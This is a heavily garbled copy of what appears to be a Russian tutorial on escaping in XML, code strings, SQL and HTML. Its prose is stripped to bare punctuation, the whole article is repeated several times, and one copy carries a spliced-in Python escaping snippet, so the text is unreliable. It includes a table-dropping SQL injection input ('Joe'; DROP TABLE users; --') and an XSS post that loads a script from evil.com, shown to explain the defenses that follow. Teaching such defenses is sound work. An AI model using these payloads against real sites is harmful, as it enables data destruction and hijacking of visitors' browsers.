? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
 ?   ,    -  ?  XML -  .   .  .       ,  -      ,         i    . 
    

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
 ?   ,    -  ?  XML -  .   .  .       ,  -      ,         i    . 
    

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post">
  <p class="meta">
    Posted by Plato on January 2, 15:31
  </p>
  <p class="body">
    I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat."
  </p>
</div>

, , , , :

<div class="post">
  <p class="meta">
    Posted by Pascal on November 23, 04:12
  </p>
  <p class="body">
    Basic math tells us that if x < n and y > n, x cannot be larger than y.
  </p>
</div>

... . , , , ?



<div class="post">
  <p class="meta">
    Posted by JackTR on July 18, 12:56
  </p>
  <p class="body">
    <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script>
  </p>
</div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name'];
$name = mysql_real_escape_string($name);
$query = "SELECT phone_number FROM users WHERE name = '$name'";
$result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post">
  <p class="meta">
    Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?>
  </p>
  <p class="body">
    <?php echo htmlspecialchars($post['body']); ?>
  </p>
</div>

htmlspecialchars , , . :

<div class="post">
  <p class="meta">
    Posted by JackTR on July 18, 12:56
  </p>
  <p class="body">
    &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt;
  </p>
</div>

, , , "". HTML .
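Added example, not the article's code: a Python re-implementation of what htmlspecialchars does (PHP 8.1+ default set, which also covers the single quote), applied to the article's JackTR post body and to the `<` / `&` cases from the XML section above. The `render_post` template, the `is_inert` check and the sample values are my own.

```python
import html

# Constructed sample input: the article's JackTR post body.
SCRIPT_BODY = ('<script src="http://evil.com/dangerous.js" '
               'type="text/javascript" charset="utf-8"></script>')

# What htmlspecialchars replaces (PHP 8.1+ defaults, which add the single quote).
_HTML_ESCAPES = {
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#039;",
}


def html_escape(value: str) -> str:
    """Rewrite every special character so the browser reads it as text.

    One pass over the characters, so an '&' that is part of the input is
    escaped exactly once and nothing we emit gets escaped a second time.
    """
    return "".join(_HTML_ESCAPES.get(ch, ch) for ch in value)


def render_post(username: str, posted: str, body: str) -> str:
    """The article's template with the user-controlled fields escaped.

    'posted' is produced by the application (the article formats it with
    date()), so it is inserted as-is; username and body come from users.
    """
    return (
        '<div class="post"> '
        f'<p class="meta"> Posted by {html_escape(username)} on {posted} </p> '
        f'<p class="body"> {html_escape(body)} </p> '
        '</div>'
    )


def _has_bare_ampersand(fragment: str) -> bool:
    """An '&' that is not the start of one of the entities we emit."""
    pos = fragment.find("&")
    while pos != -1:
        if not any(fragment.startswith(ent, pos) for ent in _HTML_ESCAPES.values()):
            return True
        pos = fragment.find("&", pos + 1)
    return False


def is_inert(fragment: str) -> bool:
    """True if a fragment can no longer open a tag or an entity.

    Sanity check on the escaper's output: '<' and a bare '&' are the
    characters that start markup, so neither may survive escaping.
    """
    return "<" not in fragment and not _has_bare_ampersand(fragment)


def round_trips(value: str) -> bool:
    """Escaping changes how the text is read, not what it says."""
    return html.unescape(html_escape(value)) == value


if __name__ == "__main__":
    print(render_post("JackTR", "July 18, 12:56", SCRIPT_BODY))
    print("inert:", is_inert(html_escape(SCRIPT_BODY)))
```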



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". .

Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
$stmt->execute([$_POST['name']]);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
 ?   ,    -  ?  XML -  .   .  .       ,  -      ,         i    . 
    

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

